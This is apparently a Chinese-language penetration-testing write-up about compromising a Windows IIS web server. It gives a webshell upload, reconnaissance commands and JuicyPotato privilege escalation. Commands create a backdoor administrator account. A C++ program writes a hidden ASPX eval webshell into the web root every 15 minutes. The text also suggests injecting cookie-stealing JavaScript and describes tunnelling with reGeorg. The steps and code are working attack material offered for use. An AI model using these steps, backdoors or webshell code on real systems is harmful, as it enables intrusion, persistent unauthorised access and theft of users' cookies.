后台文件上传修改文件后缀名GetShell成功
权限提升: 收集目标主机信息
systeminfo
ipconfig /all
查看IP地址和网卡接口信息
netstat -an
查看网络连接信息
whoami /all
查看当前账户可用权限
当前用户为iis权限小,参考三好学生博客中一篇文章:iis或者sqlserver的用户通常具有SeImpersonatePrivilege和SeAssignPrimaryPrivilege权限(文章传送门),可以尝试使用多汁马铃薯"juicy-potato"(传送门)工具来进行提升账户权限
w.exe -p "whoami"
w.exe -p "net user hong honghong+++ /add"
创建权限维持后门账号
w.exe -p "net localgroup administrators hong /add"
提升账户权限为超级管理员组
Webshell权限持久化定时向Web某目录写入aspx一句话,这里就直接贴代码
// wudawei.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。 #include<Windows.h> #include<string.h> #include<stdio.h> #include<time.h> #include "pch.h" #include <io.h> #include <iostream> #pragma warning(suppress : 4996) int main() { while (1) { Sleep(900);//延迟900秒/15分钟 ShellExecute(NULL, "open", "cmd", "/c echo ^<^%@ Page Language="Jscript"%^>^<^%eval(Request.Item["a"],"unsafe");%^>^ > C:\\inetpub\\wwwroot\\webshell.aspx", NULL, SW_HIDE); } }C:\\inetpub\\wwwroot\\webshell.aspx在Windows Server 的IIS服务器根目录下写入密码为a的一句话木马,路径可以根据实际情况做出对应合适的修改;Sleep(900);为900秒执行一次写入webshell操作。
还有另外一种方式就是控制住Web主机之后,在网站后台管理系统主页界面中插入一段窃取cookis的JavaScript恶意代码。这种方式根据实际情况可以做出对于调整。
内网资产测试:目标Windows Server WEB主机不出外网:
这里我们使用reGeorg工具对流量进行转发,上传流量转发转发aspx脚本到目标环境中,然后访问该文件路径。